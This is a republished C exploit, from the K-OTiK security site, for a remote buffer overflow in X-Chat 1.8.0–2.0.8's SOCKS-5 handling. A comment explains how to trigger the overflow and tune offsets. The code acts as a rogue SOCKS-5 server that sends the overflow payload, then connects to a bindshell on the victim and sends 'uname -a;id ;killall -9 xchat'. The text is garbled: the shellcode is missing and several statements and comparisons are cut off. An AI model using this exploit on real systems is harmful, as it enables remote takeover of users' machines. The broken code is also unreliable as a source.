X-Chat 1.8.0/2.0.8 socks5 Remote buffer overflow Exploit


/*[ X-Chat[v1.8.0 - v2.0.8]: socks-5 remote buffer overflow exploit. ]                         *
 *                                                                                                                        *
 * by: vade79/v9 v9 fakehalo deadpig org (fakehalo/realhalo)                                   *
 *                                                                                                                        *
 * X-Chat homepage:                                                                                            *
 *  http://www.xchat.org                                                                                         *
 *                                                                                                                        *
 * compile:                                                                                                           *
 *  cc xxchat-socks5.c -o xxchat-socks5                                                                   *
 *                                                                                                                        *
 * trigger bug/workings(X-Chat socks-5 comminucation):                                           *
 *  0x05,0x00                                                                                                       *
 *  0x05,0x00,0x00,0x03                                                                                       *
 *  0x?? (the size of the following "data", 255MAX(char/int8))                                     *
 *  0x??,0x??,0x?? ... ("data")                                                                                *
 *                                                                                                                        *
 *  ie. "\x05\x00\x05\x00\x00\x03\xffxxxxxxxxxxxxxxxxxxxxxxxxxxxx..."               *
 *                                                                                                                        *
 * the "data", limited by the previous byte, is then copied into a                                 *
 * 10 byte buffer labeled buf[].  the idea is to set the size of                                     *
 * the incoming data to a larger size than expected(ie. 0xff/255MAX),                         *
 * followed by sending that amount of data to exceed the 10 byte                              *
 * buffer boundary and overwrite memory addresses(stack based).                             *
 *                                                                                                                        *
 * the problem with the size limit is that it is defined in one                                        *
 * character(char/int8), making a maximum of up to 255 bytes to be                          *
 * written to buf[].  so, this only leaves about ~100+ nops breathing                           *
 * room per offset.  another problem is that the location of the                                   *
 * shellcode depends on where/what X-Chat has already done.  those                          *
 * two things together make for a very unpractical "in the wild"                                    *
 * exploit scenario.                                                                                                *
 *                                                                                                                        *
 * i just saw several cryptic advisories about this bug, so i figured                                *
 * i would look into it and see exactly what it was.                                                      *
 *                                                                                                                        *
 * if X-Chat attempts to connect to a server(through socks-5)                                     *
 * immediately upon the start of X-Chat("autoconnect") it will make                            *
 * the shellcode location a bit easier to find.  on both source                                      *
 * compiled version 1.8.0(on rh7.1) and mandrake's rpm static binary                         *
 * version 2.0.5(on mdk9.1) an offset of 2600 worked.                                              *
 *                                                                                                                        *
 * note: the first thing that is sent to the bindshell, upon                                           *
 * successful exploitation, is "killall -9 xchat".  this will kill                                          *
 * X-Chat, but still keep the bindshell alive/active.  when searching                             *
 * for the correct offset, use increments of 100(100,200,300,...).                                *
#define BUFSIZE 255
#define BSEADDR 0xbffffffa
#define DFLPORT 1080
#define DFLSPRT 7979
#define TIMEOUT 5
static char x86_exec[]= /* bindshell(??), netric based. */
char *getcode(unsigned int);
char *socks5_bind(unsigned short,unsigned int);
void getshell(char *,unsigned short);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}
int main(int argc,char **argv){
 unsigned short port=DFLPORT,sport=DFLSPRT;
 unsigned int retaddr=BSEADDR;
 char *hostptr;
 if(BUFSIZE255)printe("BUFSIZE must be 1-255(char/int8).",1);
 printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp"
 "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n");
 if(argc   printf("[!] syntax: %s [port] [shell port]\n\n",
 printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n",
char *getcode(unsigned int retaddr){
 unsigned char i=0;
 char *buf;
 if(!(buf=(char *)malloc(BUFSIZE+1)))
  printe("getcode(): allocating memory failed.",1);
 for(i=0;i  memcpy((buf+BUFSIZE-strlen(x86_exec)),x86_exec,strlen(x86_exec));
char *socks5_bind(unsigned short port,unsigned int retaddr){
 int ssock=0,sock=0,so=1;
 socklen_t salen=0;
 unsigned char *buf;
 struct sockaddr_in ssa,sa;
 setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
 setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
 printf("[*] awaiting connection from: *:%d.\n",port);
 if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
  printe("could not bind socket.",1);
 bzero((char*)&sa,sizeof(struct sockaddr_in));
 sock=accept(ssock,(struct sockaddr *)&sa,&salen);
 printf("[*] socks-5 server connection established.\n");
 if(!(buf=(unsigned char *)malloc(BUFSIZE+7+1)))
  printe("socks5_bind(): allocating memory failed.",1);
 printf("[*] sending specially crafted string. (exploit)\n");
 printf("[*] socks-5 server connection closed.\n");
void getshell(char *hostname,unsigned short port){
 int sock,r;
 fd_set fds;
 char buf[4096+1];
 struct hostent *he;
 struct sockaddr_in sa;
 printf("[*] checking to see if the exploit was successful.\n");
  printe("getshell(): socket() failed.",1);
   printe("getshell(): couldn't resolve.",1);
  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
  printf("[!] connection failed: %s:%d.\n",hostname,port);
 printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
 write(sock,"uname -a;id ;killall -9 xchat\n",30);
  if(select(sock+1,&fds,0,0,0)    printe("getshell(): select() failed.",1);
   if((r=read(0,buf,4096))     printe("getshell(): read() failed.",1);
    printe("getshell(): write() failed.",1);
   if((r=read(sock,buf,4096))     exit(0);
void printe(char *err,short e){
 printf("[!] %s\n",err);


 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits